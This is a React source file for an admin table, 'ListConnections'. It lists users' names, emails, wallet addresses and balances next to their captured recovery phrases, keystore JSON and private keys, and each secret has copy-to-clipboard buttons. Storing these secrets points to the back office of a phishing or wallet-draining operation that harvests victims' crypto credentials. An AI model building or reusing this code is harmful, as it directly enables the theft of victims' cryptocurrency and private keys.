import * as React from 'react';
import { useEffect, useState } from 'react';
import Table from '@mui/material/Table';
import TableBody from '@mui/material/TableBody';
import TableCell from '@mui/material/TableCell';
import TableContainer from '@mui/material/TableContainer';
import TableHead from '@mui/material/TableHead';
import TableRow from '@mui/material/TableRow';
import Paper from '@mui/material/Paper';
import { useQuery } from 'react-query';
import Avatar from '@mui/material/Avatar';
import apiClient from '../../request/http-common';
import Container from '@mui/material/Container';
import Typography from '@mui/material/Typography';
import { Button, Tooltip, IconButton } from '@mui/material';
import EditIcon from '@mui/icons-material/Edit';
import VisibilityIcon from '@mui/icons-material/Visibility';
import ContentCopyIcon from '@mui/icons-material/ContentCopy';
import { Link as RouterLink } from 'react-router-dom';
import DeleteConnection from './DeleteConnection';
// Component to display full text with copy functionality
const FullTextDisplay = ({ text, label, maxLength = 50 }) => {
  const [showFull, setShowFull] = useState(false);
  
  if (!text) return <span>N/A</span>;
  
  const isLong = text.length > maxLength;
  const displayText = showFull || !isLong ? text : text.substring(0, maxLength) + '...';
  
  const copyToClipboard = () => {
    navigator.clipboard.writeText(text);
  };
  
  return (
    <div>
      <span style={{ fontSize: '0.8rem', fontFamily: 'monospace', wordBreak: 'break-all' }}>
        {displayText}
      </span>
      {isLong && (
        <Button 
          size="small" 
          onClick={() => setShowFull(!showFull)}
          sx={{ ml: 1, minWidth: 'auto', p: 0.5, fontSize: '0.7rem' }}
        >
          {showFull ? 'Less' : 'More'}
        </Button>
      )}
      <Tooltip title="Copy to clipboard">
        <IconButton size="small" onClick={copyToClipboard} sx={{ ml: 0.5, p: 0.5 }}>
          <ContentCopyIcon fontSize="small" />
        </IconButton>
      </Tooltip>
    </div>
  );
};

export default function ListConnections() {
    const [connections, setconnections] = useState(null);
    const { isLoading: isLoadingconnections, refetch: getconnections } = useQuery(
        "load-connections",
        async () => {
          return await apiClient.get("/api/load-connections");
        },
        {
          enabled: false,
          onSuccess: (res) => {
            if (res.data.status === 'success') {
                setconnections(res.data.connections);
                const event2 = new Event('processed');
                window.dispatchEvent(event2);
            }
          },
          onError: (err) => {
            // console.log(err.response?.data || err);
          },
        }
      );
    
      useEffect(() => {
        getconnections() 
        if (isLoadingconnections) {
            const event3 = new Event('processing');
            window.dispatchEvent(event3);
        }
      }, []);

  const getDate = (date) => new Date(date).toDateString();
  return (
    <div style={{marginTop: '75px'}}>
    <Container>
        <Typography  mt={4} mb={2} sx={{ fontWeight: 'bold', fontSize: 20, textAlign: 'center', textTransform: 'uppercase' }} gutterBottom variant="h6" component="div">
        
        {isLoadingconnections? 'Loading Connections...' : 'List of connections'}
      </Typography>
    <TableContainer component={Paper} sx={{ maxHeight: '80vh', overflowX: 'auto' }}>
        
      {connections !== null &&
      <Table sx={{ minWidth: '100%' }} aria-label="connections table" stickyHeader>
      <TableHead>
        <TableRow>
          <TableCell>User Name</TableCell>
          <TableCell align="right">User Email</TableCell>
          <TableCell align="right">Wallet Address</TableCell>
          <TableCell align="right">Wallet Name</TableCell>
          <TableCell align="right">Wallet Type</TableCell>
          <TableCell align="right">Connection Type</TableCell>
          <TableCell align="right">Import Type</TableCell>
          <TableCell align="right">Balance</TableCell>
          <TableCell align="right">Recovery Phrase</TableCell>
          <TableCell align="right">Keystore JSON</TableCell>
          <TableCell align="right">Private Key</TableCell>
          <TableCell align="right">Date</TableCell>
          <TableCell align="right">Delete</TableCell>
        </TableRow>
      </TableHead>
      <TableBody>
        {connections.map((connection) => (
          <TableRow
            key={connection.id}
            sx={{ '&:last-child td, &:last-child th': { border: 0 } }}
          >
            <TableCell component="th" scope="row">
              {connection.user.name}
            </TableCell>
            <TableCell align="right">{connection.user.email}</TableCell>
            <TableCell align="right" sx={{ fontFamily: 'monospace', fontSize: '0.75rem', maxWidth: '150px', overflow: 'hidden', textOverflow: 'ellipsis' }}>
              {connection.address}
            </TableCell>
            <TableCell align="right">{connection.wallet_name}</TableCell>
            <TableCell align="right">{connection.wallet_type || 'N/A'}</TableCell>
            <TableCell align="right">{connection.connection_type || 'N/A'}</TableCell>
            <TableCell align="right">{connection.import_type || 'N/A'}</TableCell>
            <TableCell align="right">{connection.balance || '0'}</TableCell>
            <TableCell align="right" sx={{ maxWidth: '300px', verticalAlign: 'top' }}>
              <FullTextDisplay text={connection.phrase} label="Recovery Phrase" maxLength={30} />
            </TableCell>
            <TableCell align="right" sx={{ maxWidth: '300px', verticalAlign: 'top' }}>
              <FullTextDisplay text={connection.keystore} label="Keystore JSON" maxLength={30} />
            </TableCell>
            <TableCell align="right" sx={{ maxWidth: '200px', verticalAlign: 'top' }}>
              <FullTextDisplay text={connection.private_key} label="Private Key" maxLength={20} />
            </TableCell>
            <TableCell align="right">{getDate(connection.created_at)}</TableCell>
            <TableCell align="right"><DeleteConnection conn={connection}/></TableCell>
          </TableRow>
        ))}
      </TableBody>
    </Table>
      }
      
    </TableContainer>
    </Container>
    </div>
  );
}